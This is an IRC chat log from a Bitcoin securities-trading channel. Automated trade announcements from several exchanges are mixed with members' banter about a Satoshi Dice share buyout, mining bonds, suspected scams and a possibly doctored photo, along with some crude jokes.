https://www.flickr.com/photos/98907028@N08/9312268912/in/photostream/lightbox/ Jul 18 06:34:29 :) Jul 18 06:35:16 [BTCTC] [AMC-PT] 399 @ 0.0025 = 0.9975 BTC [+] Jul 18 06:35:44 blacked out the mailing address but not the licensed location ? Jul 18 06:35:45 odd. Jul 18 06:35:53 http://goo.gl/maps/Vlk4M Jul 18 06:35:55 450 H south union ave, springfield, missouri - Google Maps Jul 18 06:35:59 mp pm Jul 18 06:36:02 associated thetrical contractors Jul 18 06:36:06 theatrical Jul 18 06:36:09 hahaha Jul 18 06:36:12 [BTCTC] [DMS.MINING] 60 @ 0.015799 = 0.9479 BTC [-] Jul 18 06:36:15 "Please note that due to my vacation in Spain, the payout and buy back of the S.DICE shares will not happen until the 28th. I am sorry for this but I do not have my gpg key and such on my laptop they are on a dedicated computer of which I currently do not have access to. Best Regards, DeaDTerra" Jul 18 06:36:22 well... without coincidences what;'d bitcoin be Jul 18 06:36:22 motherfucker! Jul 18 06:36:28 lol Jul 18 06:37:27 dub dude zoom in Jul 18 06:37:28 it's the Jul 18 06:37:35 springfield FIGHT CLUB Jul 18 06:37:47 the first rule of which, presumably, is that you call it amcvmcetc Jul 18 06:37:57 [BTCTC] [DMS.MINING] 26 @ 0.0158 = 0.4108 BTC [+] Jul 18 06:39:31 mircea_popescu: there wont be a shortage of bouncers! xD Jul 18 06:39:49 the VMC sign he's standing next to Jul 18 06:40:04 shit could not look any more shooped Jul 18 06:40:21 [BTCTC] [DMS.SELLING] 2 @ 0.024235 = 0.0485 BTC [+] Jul 18 06:40:23 [BTCTC] [DMS.SELLING] 8 @ 0.0248 = 0.1984 BTC [+] Jul 18 06:40:47 TaT: Not surprised, DeaDTerra isn't around a lot. Jul 18 06:41:16 he had no issue paying AM divs today Jul 18 06:41:21 dub: how about this one? http://axs.net/AMC/VMC/photo.jpg Jul 18 06:41:27 [BTCTC] [ASICMINER-PT] 1 @ 4.49799 BTC [+] Jul 18 06:41:58 TaT, I often pay divs with funds I already have on the exchanges myself, not withdrawing from MPEx. Jul 18 06:42:05 love his shoes too Jul 18 06:42:12 tassling like a motherfucker Jul 18 06:42:21 1 million S.DICE shares might be hard to pay from your current funds. Jul 18 06:42:27 hehehe Jul 18 06:43:00 trucks outside in streetview lol Jul 18 06:43:19 xD Jul 18 06:43:22 to order call: (866) 522-MEAT Jul 18 06:43:27 hahahahaha Jul 18 06:43:59 g2g l8er ppl! :) Jul 18 06:44:22 now that Vbs is gone Jul 18 06:44:23 http://imgur.com/H4kHM4Q Jul 18 06:44:46 WTF... Jul 18 06:45:03 looks real Jul 18 06:45:11 probly not photoshopped Jul 18 06:45:22 its shooped Jul 18 06:45:22 My eyes, why did you do that! Jul 18 06:45:26 can tell by the pixels Jul 18 06:45:29 [BTCTC] [TAT.ASICMINER] 23 @ 0.04325 = 0.9948 BTC [+] Jul 18 06:45:49 the sign, yeah, but the girl is real Jul 18 06:46:16 O god Jul 18 06:46:21 What did I click Jul 18 06:46:47 Is that you during your college years tat? Jul 18 06:47:29 it's satoshi Jul 18 06:47:35 Indeed dub. You can always tell by the pixels. If you zoom in A LOT, each pixel as a "Photoshop®" watermark. Jul 18 06:48:24 l2meme Jul 18 06:50:03 [MPEX] [S.MPOE] 9704 @ 0.00088436 = 8.5818 BTC [+] Jul 18 06:50:08 [MPEX] [S.MPOE] 12400 @ 0.00088454 = 10.9683 BTC [+] Jul 18 06:50:14 [MPEX] [S.MPOE] 12200 @ 0.00088482 = 10.7948 BTC [+] Jul 18 06:50:16 [MPEX] [S.MPOE] 442 @ 0.0008862 = 0.3917 BTC [+] Jul 18 06:52:41 http://i.imgur.com/H4kHM4Q.jpg << dub just sent me that Jul 18 06:53:05 wat Jul 18 06:53:20 TaT just posted it like 20 lines up. Jul 18 06:53:54 oic Jul 18 06:59:52 http://imgur.com/7FTmCxY Jul 18 06:59:54 imgur: the simple image sharer Jul 18 07:01:00 [BTCTC] [S.DICE-PT] 10 @ 0.00322 = 0.0322 BTC [-] Jul 18 07:02:46 [BTCTC] [S.DICE-PT] 20 @ 0.0027 = 0.054 BTC [-] Jul 18 07:02:49 [BTCTC] [TAT.ASICMINER] 18 @ 0.043 = 0.774 BTC [-] Jul 18 07:03:39 [BTCTC] [AMC-PT] 13 @ 0.0025 = 0.0325 BTC [+] Jul 18 07:03:42 [BTCTC] [TAT.ASICMINER] 98 @ 0.043 = 4.214 BTC [-] Jul 18 07:04:22 lol Jul 18 07:05:24 [BTCTC] [AMC-PT] 179 @ 0.0025 = 0.4475 BTC [+] Jul 18 07:06:32 [BTCTC] [S.DICE-PT] 3992 @ 0.00343 = 13.6926 BTC [+] Jul 18 07:06:46 related: https://twitter.com/kimcooksforyou/status/357705204747087873/photo/1 Jul 18 07:07:13 [MPEX] [S.MPOE] 18000 @ 0.0008862 = 15.9516 BTC [+] Jul 18 07:07:18 [BTCTC] [AMC-PT] 500 @ 0.0025 = 1.25 BTC [+] Jul 18 07:07:57 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.004199 = 0.126 BTC [-] Jul 18 07:08:21 http://labratmining.com/ Jul 18 07:08:22 Lab Rat Mining Jul 18 07:08:27 "I have decided to give the bondholders a nice juicy bonus due to such a wonderful opening sale. For every 20k bonds sold I will guarantee a minimum of a 10MH/s per bond increase." Jul 18 07:08:29 [BTCTC] [GSDPT] 783 @ 0.0034 = 2.6622 BTC [-] Jul 18 07:08:30 [BTCTC] [GSDPT] 1500 @ 0.003401 = 5.1015 BTC [+] Jul 18 07:09:35 BTCT.co/BitFunder went full GLBSE... You never go full GLBSE... Jul 18 07:10:56 [BTCTC] [S.DICE-PT] 25 @ 0.00344 = 0.086 BTC [+] Jul 18 07:11:08 what's sad is BTCT is getting sloppy seconds on this stuff Jul 18 07:12:20 I wish there was a better selection of stocks.. I'd like to see places like Bitmit and BTCJam start listing Jul 18 07:12:26 [BTCTC] [S.DICE-PT] 1609 @ 0.00345 = 5.5511 BTC [+] Jul 18 07:12:27 [BTCTC] [S.DICE-PT] 19 @ 0.00345 = 0.0656 BTC [+] Jul 18 07:12:30 When I asked LabRat about what pool they'd be on and mining transparency: " I will be mining on a private pool to provide security against attackers. Someone DDoSing pools to mess with the company is not an option, but if you'd like to check my numbers of what I'm paying out you can average a few weeks pay and run a calculator yourself." Jul 18 07:13:00 this is the reality we are in, sorry Jul 18 07:13:21 Yeah, true Jul 18 07:13:46 Bitmit, BTCJam, etc... these don't work too well. Not so much revenue I think. Jul 18 07:13:49 get your ASICMINER, S.MPOE, S.MG, and S.MPOE while you still can Jul 18 07:13:59 [BTCTC] [S.DICE-PT] 380 @ 0.003469 = 1.3182 BTC [+] Jul 18 07:14:02 eventually people will figure it out Jul 18 07:14:06 he's tight with BFL, maybe its the 'BFL testing pool' Jul 18 07:14:15 i meant BBET Jul 18 07:14:16 sry Jul 18 07:14:47 is there anything I missed Jul 18 07:15:01 [HAVELOCK] [SDSTM] 24 @ 0.01010001 = 0.2424 BTC [-] Jul 18 07:15:03 [HAVELOCK] [SDSTM] 2 @ 0.0101 = 0.0202 BTC [-] Jul 18 07:15:04 [HAVELOCK] [SDSTM] 1 @ 0.0101 BTC [-] Jul 18 07:15:34 [BTCTC] [COGNITIVE] 3 @ 0.84 = 2.52 BTC [-] Jul 18 07:15:36 [BTCTC] [COGNITIVE] 1 @ 0.84 BTC [-] Jul 18 07:16:31 [BTCTC] [COGNITIVE] 1 @ 0.83 BTC [-] Jul 18 07:16:52 BitVPS/BTC-BOND? Jul 18 07:17:00 scams Jul 18 07:17:06 Pff Jul 18 07:17:08 i know nothing of BVPS, Jul 18 07:17:18 but you do have a decent track record with the bond Jul 18 07:17:39 oh yeah I forget Deprived's bonds and fund Jul 18 07:17:45 forgot Jul 18 07:17:52 The statements I make for BitVPS must be some of the most transparent ones around. Jul 18 07:18:15 provably fair? Jul 18 07:18:41 Not really possible to do that however. That's for each to judge. Jul 18 07:18:54 [BTCTC] [S.DICE-PT] 12 @ 0.003469 = 0.0416 BTC [+] Jul 18 07:19:27 [BTCTC] [S.DICE-PT] 160 @ 0.00347 = 0.5552 BTC [+] Jul 18 07:20:45 [BTCTC] [TAT.ASICMINER] 15 @ 0.043249 = 0.6487 BTC [+] Jul 18 07:21:53 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004197 BTC [-] Jul 18 07:21:55 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.00415 = 0.83 BTC [-] Jul 18 07:21:57 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0041 = 0.041 BTC [-] Jul 18 07:21:58 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0041 = 0.0082 BTC [-] Jul 18 07:22:00 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00404 = 0.0404 BTC [-] Jul 18 07:22:02 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004006 BTC [-] Jul 18 07:22:04 [BTCTC] [TAT.VIRTUALMINE] 131 @ 0.004 = 0.524 BTC [-] Jul 18 07:22:06 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004 = 0.04 BTC [-] Jul 18 07:22:08 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.004 = 0.052 BTC [-] Jul 18 07:24:40 [BTCTC] [AMC-PT] 59 @ 0.0025 = 0.1475 BTC [+] Jul 18 07:24:46 [HAVELOCK] [AM100] 42 @ 0.041789 = 1.7551 BTC [+] Jul 18 07:25:34 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003924 = 0.0392 BTC [-] Jul 18 07:25:36 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003923 BTC [-] Jul 18 07:25:37 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003922 = 0.3922 BTC [-] Jul 18 07:25:39 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.003921 = 1.9605 BTC [-] Jul 18 07:25:40 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00392 = 0.392 BTC [-] Jul 18 07:25:42 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.003901 = 0.0234 BTC [-] Jul 18 07:25:42 [BTCTC] [TAT.VIRTUALMINE] 186 @ 0.0039 = 0.7254 BTC [-] Jul 18 07:27:04 [BTCTC] [COGNITIVE] 1 @ 0.83 BTC [-] Jul 18 07:28:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.043249 = 0.1297 BTC [+] Jul 18 07:30:04 [MPEX] [S.MPOE] 9259 @ 0.00088442 = 8.1888 BTC [-] Jul 18 07:32:49 [BTCTC] [TAT.ASICMINER] 43 @ 0.042801 = 1.8404 BTC [-] Jul 18 07:32:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.042801 = 0.1284 BTC [-] Jul 18 07:33:40 [BTCTC] [TAT.ASICMINER] 43 @ 0.0428 = 1.8404 BTC [-] Jul 18 07:34:06 [HAVELOCK] [AM100] 1 @ 0.041789 BTC [+] Jul 18 07:34:14 [BTCTC] [COGNITIVE] 1 @ 0.81058 BTC [-] Jul 18 07:35:22 [BTCTC] [TAT.ASICMINER] 57 @ 0.0428 = 2.4396 BTC [-] Jul 18 07:35:42 [BTCTC] [BASIC-MINING] 1 @ 0.777 BTC [+] Jul 18 07:36:16 [BTCTC] [ASICMINER-PT] 1 @ 4.483999 BTC [-] Jul 18 07:37:43 well... Jul 18 07:38:01 if someone wants to buy it from me, then maybe Jul 18 07:38:40 [BTCTC] [AMC-PT] 16 @ 0.0025 = 0.04 BTC [+] Jul 18 07:38:44 [BTCTC] [ASICMINER-PT] 1 @ 4.484 BTC [+] Jul 18 07:40:19 [BTCTC] [BASIC-MINING] 1 @ 0.728 BTC [-] Jul 18 07:40:21 [BTCTC] [BASIC-MINING] 2 @ 0.727001 = 1.454 BTC [-] Jul 18 07:40:34 [BTCTC] [BASIC-MINING] 3 @ 0.779999 = 2.34 BTC [+] Jul 18 07:40:44 [BTCTC] [BASIC-MINING] 1 @ 0.727001 BTC [-] Jul 18 07:41:10 [BTCTC] [BASIC-MINING] 1 @ 0.727 BTC [-] Jul 18 07:41:40 [BTCTC] [BASIC-MINING] 1 @ 0.7166 BTC [-] Jul 18 07:41:47 [BTCTC] [BASIC-MINING] 2 @ 0.779998 = 1.56 BTC [+] Jul 18 07:42:26 [BTCTC] [BASIC-MINING] 1 @ 0.75 BTC [-] Jul 18 07:42:31 [BTCTC] [BASIC-MINING] 1 @ 0.715 BTC [-] Jul 18 07:42:33 [BTCTC] [BASIC-MINING] 1 @ 0.715 BTC [-] Jul 18 07:42:34 [BTCTC] [BASIC-MINING] 1 @ 0.715 BTC [-] Jul 18 07:42:51 [BTCTC] [BASIC-MINING] 1 @ 0.715 BTC [-] Jul 18 07:43:01 ThickAsThieves: 126318 btc be enough? Jul 18 07:43:30 [BTCTC] [BASIC-MINING] 5 @ 0.779999 = 3.9 BTC [+] Jul 18 07:43:32 [BTCTC] [BASIC-MINING] 5 @ 0.78 = 3.9 BTC [+] Jul 18 07:43:37 [BTCTC] [BASIC-MINING] 1 @ 0.705501 BTC [-] Jul 18 07:43:39 [BTCTC] [BASIC-MINING] 1 @ 0.705501 BTC [-] Jul 18 07:43:39 [BTCTC] [BASIC-MINING] 1 @ 0.705501 BTC [-] Jul 18 07:44:11 [BTCTC] [BASIC-MINING] 2 @ 0.7055 = 1.411 BTC [-] Jul 18 07:44:24 I'll take 500'000 BTC to go. That would cost me 100 pizza right? Jul 18 07:44:28 sure Jul 18 07:44:42 [BTCTC] [TAT.ASICMINER] 32 @ 0.043249 = 1.384 BTC [+] Jul 18 07:45:16 [BTCTC] [ASICMINER-PT] 2 @ 4.485 = 8.97 BTC [+] Jul 18 07:45:58 [HAVELOCK] [AM100] 29 @ 0.041789 = 1.2119 BTC [+] Jul 18 07:46:16 [BTCTC] [BASIC-MINING] 1 @ 0.700101 BTC [-] Jul 18 07:46:38 [BTCTC] [ASICMINER-PT] 1 @ 4.4855 BTC [+] Jul 18 07:47:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.04325 = 0.0865 BTC [+] Jul 18 07:48:36 [HAVELOCK] [AM100] 6 @ 0.041789 = 0.2507 BTC [+] Jul 18 07:48:39 [BTCTC] [BASIC-MINING] 1 @ 0.700101 BTC [-] Jul 18 07:48:41 [BTCTC] [BASIC-MINING] 1 @ 0.7001 BTC [-] Jul 18 07:49:11 [BTCTC] [BASIC-MINING] 1 @ 0.7001 BTC [-] Jul 18 07:49:43 [BTCTC] [BASIC-MINING] 1 @ 0.6988 BTC [-] Jul 18 07:50:32 [BTCTC] [BASIC-MINING] 1 @ 0.6943 BTC [-] Jul 18 07:52:42 [BTCTC] [TAT.ASICMINER] 13 @ 0.042801 = 0.5564 BTC [-] Jul 18 07:54:52 [BTCTC] [TAT.ASICMINER] 23 @ 0.042801 = 0.9844 BTC [-] Jul 18 07:54:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.0428 = 0.428 BTC [-] Jul 18 07:54:56 [BTCTC] [TAT.ASICMINER] 19 @ 0.0428 = 0.8132 BTC [-] Jul 18 07:55:57 jesus, xpm is going ballistic Jul 18 07:56:06 xpm? Jul 18 07:56:13 primecoin Jul 18 07:56:49 [BTCTC] [ASICMINER-PT] 1 @ 4.445 BTC [-] Jul 18 07:58:55 [BTCTC] [BASIC-MINING] 9 @ 0.727001 = 6.543 BTC [+] Jul 18 08:00:42 [BTCTC] [S.DICE-PT] 100 @ 0.00343 = 0.343 BTC [-] Jul 18 08:00:49 [BTCTC] [ASICMINER-PT] 1 @ 4.44 BTC [-] Jul 18 08:01:03 [MPEX] [S.MPOE] 4495 @ 0.00088368 = 3.9721 BTC [-] Jul 18 08:01:06 [BTCTC] [BASIC-MINING] 7 @ 0.727001 = 5.089 BTC [+] Jul 18 08:01:10 [MPEX] [S.MPOE] 1569 @ 0.00088317 = 1.3857 BTC [-] Jul 18 08:01:10 Primecoin? What sillyness. Jul 18 08:03:07 [BTCTC] [AMC-PT] 450 @ 0.0025 = 1.125 BTC [+] Jul 18 08:03:22 [BTCTC] [TAT.ASICMINER] 37 @ 0.043249 = 1.6002 BTC [+] Jul 18 08:04:21 [BTCTC] [BASIC-MINING] 2 @ 0.779999 = 1.56 BTC [+] Jul 18 08:04:58 [BTCTC] [BASIC-MINING] 4 @ 0.78 = 3.12 BTC [+] Jul 18 08:05:15 [BTCTC] [BASIC-MINING] 1 @ 0.78 BTC [+] Jul 18 08:06:22 [BTCTC] [COGNITIVE] 1 @ 0.800002 BTC [-] Jul 18 08:06:53 [BTCTC] [BASIC-MINING] 1 @ 0.78 BTC [+] Jul 18 08:07:39 [BTCTC] [AMC-PT] 5000 @ 0.0025 = 12.5 BTC [+] Jul 18 08:07:54 [BTCTC] [TAT.ASICMINER] 13 @ 0.043249 = 0.5622 BTC [+] Jul 18 08:08:17 [HAVELOCK] [HIM] 2 @ 0.26601 = 0.532 BTC [-] Jul 18 08:08:27 [HAVELOCK] [HIM] 1 @ 0.26600001 BTC [-] Jul 18 08:08:28 [BTCTC] [DMS.PURCHASE] 2 @ 0.039759 = 0.0795 BTC [+] Jul 18 08:08:28 [BTCTC] [BASIC-MINING] 7 @ 0.78 = 5.46 BTC [+] Jul 18 08:08:37 [HAVELOCK] [HIM] 60 @ 0.266 = 15.96 BTC [-] Jul 18 08:08:52 [BTCTC] [BASIC-MINING] 1 @ 0.78 BTC [+] Jul 18 08:10:58 [BTCTC] [TAT.ASICMINER] 7 @ 0.04325 = 0.3028 BTC [+] Jul 18 08:13:50 [BTCTC] [AMC-PT] 5000 @ 0.0025 = 12.5 BTC [+] Jul 18 08:14:15 [BTCTC] [AMC-PT] 104 @ 0.0025 = 0.26 BTC [+] Jul 18 08:14:43 [BTCTC] [S.DICE-PT] 5 @ 0.003439 = 0.0172 BTC [+] Jul 18 08:15:19 [BTCTC] [GSDPT] 188 @ 0.0034 = 0.6392 BTC [-] Jul 18 08:17:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.043249 = 0.1297 BTC [-] Jul 18 08:18:17 [BTCTC] [GSDPT] 24 @ 0.003103 = 0.0745 BTC [-] Jul 18 08:18:43 [HAVELOCK] [AM100] 999 @ 0.04179 = 41.7482 BTC [+] Jul 18 08:19:32 [BTCTC] [S.DICE-PT] 20 @ 0.00323 = 0.0646 BTC [-] Jul 18 08:20:59 [BTCTC] [ASICMINER-PT] 1 @ 4.450001 BTC [+] Jul 18 08:21:00 [BTCTC] [ASICMINER-PT] 3 @ 4.45 = 13.35 BTC [-] Jul 18 08:21:20 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 18 08:28:57 [HAVELOCK] [HIM] 7 @ 0.2655 = 1.8585 BTC [-] Jul 18 08:29:39 [HAVELOCK] [HIM] 4 @ 0.265 = 1.06 BTC [-] Jul 18 08:30:33 [BTCTC] [TAT.ASICMINER] 45 @ 0.043249 = 1.9462 BTC [-] Jul 18 08:31:17 [HAVELOCK] [HIM] 4 @ 0.2649 = 1.0596 BTC [-] Jul 18 08:32:39 [HAVELOCK] [AM100] 5 @ 0.0418 = 0.209 BTC [+] Jul 18 08:33:45 [HAVELOCK] [HIM] 12 @ 0.26300001 = 3.156 BTC [-] Jul 18 08:35:37 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.004085 = 0.4085 BTC [+] Jul 18 08:36:20 [HAVELOCK] [HIM] 1 @ 0.265 BTC [+] Jul 18 08:37:26 [HAVELOCK] [AM100] 96 @ 0.04184999 = 4.0176 BTC [+] Jul 18 08:37:30 [MPEX] [S.MPOE] 9512 @ 0.00088442 = 8.4126 BTC [+] Jul 18 08:37:32 [MPEX] [S.MPOE] 179 @ 0.0008862 = 0.1586 BTC [+] Jul 18 08:37:37 [MPEX] [S.MPOE] 9809 @ 0.00088636 = 8.6943 BTC [+] Jul 18 08:38:21 [HAVELOCK] [HIM] 1 @ 0.295 BTC [+] Jul 18 08:40:55 [BTCTC] [S.MPOE-PT] 1 @ 0.000826 BTC [+] Jul 18 08:40:56 [BTCTC] [S.MPOE-PT] 198 @ 0.000825 = 0.1634 BTC [-] Jul 18 08:40:58 [BTCTC] [S.MPOE-PT] 300 @ 0.000824 = 0.2472 BTC [-] Jul 18 08:41:00 [BTCTC] [S.MPOE-PT] 100 @ 0.000821 = 0.0821 BTC [-] Jul 18 08:41:02 [BTCTC] [S.MPOE-PT] 300 @ 0.00082 = 0.246 BTC [-] Jul 18 08:41:03 [BTCTC] [S.MPOE-PT] 765 @ 0.000817 = 0.625 BTC [-] Jul 18 08:44:22 [MPEX] [S.MPOE] 6869 @ 0.00088317 = 6.0665 BTC [-] Jul 18 08:48:46 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 18 08:50:39 [MPEX] [S.MPOE] 4094 @ 0.00088079 = 3.606 BTC [-] Jul 18 08:52:35 thestringpuller: 94.07 Jul 18 08:52:43 18.06144 Jul 18 08:54:03 [BTCTC] [BTC-BOND] 20 @ 0.009996 = 0.1999 BTC [+] Jul 18 08:55:01 [BTCTC] [ASICMINER-PT] 1 @ 4.47 BTC [+] Jul 18 08:55:03 [BTCTC] [ASICMINER-PT] 1 @ 4.476999 BTC [+] Jul 18 08:55:05 [BTCTC] [ASICMINER-PT] 5 @ 4.477 = 22.385 BTC [+] Jul 18 08:58:58 [BTCTC] [TAT.ASICMINER] 22 @ 0.042811 = 0.9418 BTC [-] Jul 18 08:59:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.04281 = 0.1284 BTC [-] Jul 18 08:59:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.0428 = 0.0856 BTC [-] Jul 18 08:59:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.04277 BTC [-] Jul 18 08:59:06 [BTCTC] [TAT.ASICMINER] 74 @ 0.042767 = 3.1648 BTC [-] Jul 18 08:59:52 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 18 09:02:56 [BTCTC] [COGNITIVE] 1 @ 0.801 BTC [+] Jul 18 09:02:58 [BTCTC] [COGNITIVE] 1 @ 0.80004 BTC [-] Jul 18 09:03:00 [BTCTC] [COGNITIVE] 2 @ 0.800002 = 1.6 BTC [-] Jul 18 09:03:01 [BTCTC] [COGNITIVE] 1 @ 0.8 BTC [-] Jul 18 09:03:03 http://buttcoin.org/satoshi-dice-sold-for-12000000-forces-all-shareholders-to-give-up-their-shares Jul 18 09:03:05 Satoshi Dice sold for $12,000,000, forces all shareholders to give up their shares. - Buttcoin - The Jul 18 09:03:26 [BTCTC] [AMC-PT] 1363 @ 0.0025 = 3.4075 BTC [+] Jul 18 09:06:32 lol trying to run all the angles. Jul 18 09:06:44 the price is too low and people bought on insider info!!!1 Jul 18 09:06:49 [MPEX] [S.MPOE] 6808 @ 0.00088067 = 5.9956 BTC [-] Jul 18 09:07:40 on like, no volume!!! rawr! Jul 18 09:07:49 hehe Jul 18 09:08:02 there was that one big sell for like 500k Jul 18 09:08:17 but i dont think you can count filling bids as insider trading here Jul 18 09:08:46 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 18 09:09:18 [BTCTC] [BITVPS] 2898 @ 0.0018 = 5.2164 BTC [+] Jul 18 09:09:28 passive insider trading!!! Jul 18 09:09:29 [BTCTC] [TAT.ASICMINER] 50 @ 0.042767 = 2.1384 BTC [-] Jul 18 09:09:45 possibly true Jul 18 09:10:06 Erik says, lemme throw a whopper bid up, see if anyone bites Jul 18 09:10:21 [BTCTC] [S.DICE-PT] 6 @ 0.003439 = 0.0206 BTC [+] Jul 18 09:10:38 [BTCTC] [ASICMINER-PT] 2 @ 4.46 = 8.92 BTC [-] Jul 18 09:10:49 that buyer's getting $75k for it Jul 18 09:11:01 roughly Jul 18 09:11:21 Weapon Systems in PVP Jul 18 09:11:21 Weapons are a fairly fundamental part of PVP Jul 18 09:11:30 dude srsly. Jul 18 09:11:35 gairly Jul 18 09:11:38 fairly* Jul 18 09:11:51 arguably butthurt is more fundamental i guess Jul 18 09:12:04 eyeballs are a fairly fundamental part of PVP Jul 18 09:12:33 [BTCTC] [S.DICE-PT] 5 @ 0.003438 = 0.0172 BTC [-] Jul 18 09:13:33 [BTCTC] [S.DICE-PT] 149 @ 0.003439 = 0.5124 BTC [+] Jul 18 09:13:44 [BTCTC] [COGNITIVE] 1 @ 0.8 BTC [-] Jul 18 09:14:24 [BTCTC] [BTC-BOND] 100 @ 0.009996 = 0.9996 BTC [+] Jul 18 09:14:46 [BTCTC] [BTC-GOLD] 5 @ 0.044 = 0.22 BTC [+] Jul 18 09:14:48 [BTCTC] [BTC-GOLD] 2 @ 0.045 = 0.09 BTC [+] Jul 18 09:14:50 [BTCTC] [BTC-GOLD] 5 @ 0.047 = 0.235 BTC [+] Jul 18 09:14:57 [BTCTC] [BTC-GOLD] 47 @ 0.05 = 2.35 BTC [+] Jul 18 09:15:06 [BTCTC] [LTC-ATF.B2] 10 @ 0.0104 = 0.104 BTC [+] Jul 18 09:15:08 blowjobs are a fairly fundamental part of pvp, because i enjoy getting them Jul 18 09:15:09 and pvp. Jul 18 09:15:44 [BTCTC] [S.DICE-PT] 520 @ 0.00344 = 1.7888 BTC [+] Jul 18 09:15:46 will this game have blowjobs? Jul 18 09:16:49 [BTCTC] [S.DICE-PT] 230 @ 0.00344 = 0.7912 BTC [+] Jul 18 09:19:23 ideally. Jul 18 09:20:37 [BTCTC] [S.DICE-PT] 5 @ 0.00344 = 0.0172 BTC [+] Jul 18 09:22:58 6.335 Jul 18 09:23:10 [BTCTC] [TAT.ASICMINER] 10 @ 0.043399 = 0.434 BTC [+] Jul 18 09:23:42 [BTCTC] [DMS.MINING] 1 @ 0.015987 BTC [+] Jul 18 09:25:13 [BTCTC] [BMF] 2 @ 0.037 = 0.074 BTC [-] Jul 18 09:25:16 [BTCTC] [BMF] 2 @ 0.036 = 0.072 BTC [-] Jul 18 09:25:23 it causes YOUR character to drop to his knees Jul 18 09:25:31 it's an easter egg Jul 18 09:25:34 enjoy! Jul 18 09:25:58 [MPEX] [S.MPOE] 1650 @ 0.00087893 = 1.4502 BTC [-] Jul 18 09:26:00 [MPEX] [S.MPOE] 2600 @ 0.00087856 = 2.2843 BTC [-] Jul 18 09:26:03 [MPEX] [S.MPOE] 1100 @ 0.00087851 = 0.9664 BTC [-] Jul 18 09:27:15 [BTCTC] [S.DICE-PT] 30 @ 0.00344 = 0.1032 BTC [+] Jul 18 09:29:37 [BTCTC] [TAT.ASICMINER] 5 @ 0.043371 = 0.2169 BTC [-] Jul 18 09:29:53 [MPEX] [S.MPOE] 4900 @ 0.00087851 = 4.3047 BTC [-] Jul 18 09:30:20 [BTCTC] [AMC-PT] 809 @ 0.0025 = 2.0225 BTC [+] Jul 18 09:30:43 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 18 09:31:18 [BTCTC] [BASIC-MINING] 1 @ 0.71 BTC [-] Jul 18 09:31:48 [BTCTC] [BASIC-MINING] 6 @ 0.700102 = 4.2006 BTC [-] Jul 18 09:32:08 [BTCTC] [BASIC-MINING] 3 @ 0.700101 = 2.1003 BTC [-] Jul 18 09:32:54 [BTCTC] [TAT.ASICMINER] 18 @ 0.042282 = 0.7611 BTC [-] Jul 18 09:33:33 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 18 09:34:24 [BTCTC] [AMC-PT] 20 @ 0.0025 = 0.05 BTC [+] Jul 18 09:34:53 [BTCTC] [AMC-PT] 9 @ 0.0025 = 0.0225 BTC [+] Jul 18 09:48:41 [BTCTC] [TAT.ASICMINER] 4 @ 0.043 = 0.172 BTC [+] Jul 18 09:48:58 [BTCTC] [ASICMINER-PT] 1 @ 4.431001 BTC [-] Jul 18 09:52:04 [BTCTC] [S.DICE-PT] 1 @ 0.00332 BTC [-] Jul 18 09:52:39 [BTCTC] [DMS.MINING] 44 @ 0.015002 = 0.6601 BTC [-] Jul 18 09:52:51 oh snap Jul 18 09:53:00 dat selloff Jul 18 09:53:03 [BTCTC] [DMS.SELLING] 30 @ 0.02479 = 0.7437 BTC [-] Jul 18 09:53:08 [BTCTC] [DMS.PURCHASE] 1 @ 0.039759 BTC [+] Jul 18 09:53:53 what selloff? Jul 18 09:54:10 8k btc got dumped Jul 18 09:54:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.043098 BTC [+] Jul 18 09:54:21 for monopoly mtgoxusd Jul 18 09:54:38 ah Jul 18 09:55:09 ;;later tell Snookers "yes coinbr users will get paid full 0.0035 per s.dice share" Jul 18 09:55:09 The operation succeeded. Jul 18 09:55:43 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 18 09:56:44 [BTCTC] [ASICMINER-PT] 1 @ 4.431001 BTC [-] Jul 18 09:56:56 [BTCTC] [TAT.ASICMINER] 28 @ 0.042288 = 1.1841 BTC [-] Jul 18 09:57:20 [BTCTC] [TAT.ASICMINER] 31 @ 0.042287 = 1.3109 BTC [-] Jul 18 09:59:37 ohh that was tibby... psyched about his few crumbs on coinbr Jul 18 09:59:57 *reads moar* Jul 18 10:03:19 [BTCTC] [S.DICE-PT] 33 @ 0.00332 = 0.1096 BTC [-] Jul 18 10:04:13 [HAVELOCK] [AM1] 2 @ 4.4 = 8.8 BTC [-] Jul 18 10:04:32 [HAVELOCK] [AM1] 1 @ 4.4 BTC [-] Jul 18 10:04:46 [HAVELOCK] [AM100] 50 @ 0.041848 = 2.0924 BTC [-] Jul 18 10:04:52 [BTCTC] [GSDPT] 1 @ 0.003103 BTC [-] Jul 18 10:05:02 [HAVELOCK] [AM100] 40 @ 0.04184999 = 1.674 BTC [+] Jul 18 10:06:41 [BTCTC] [ASICMINER-PT] 1 @ 4.459399 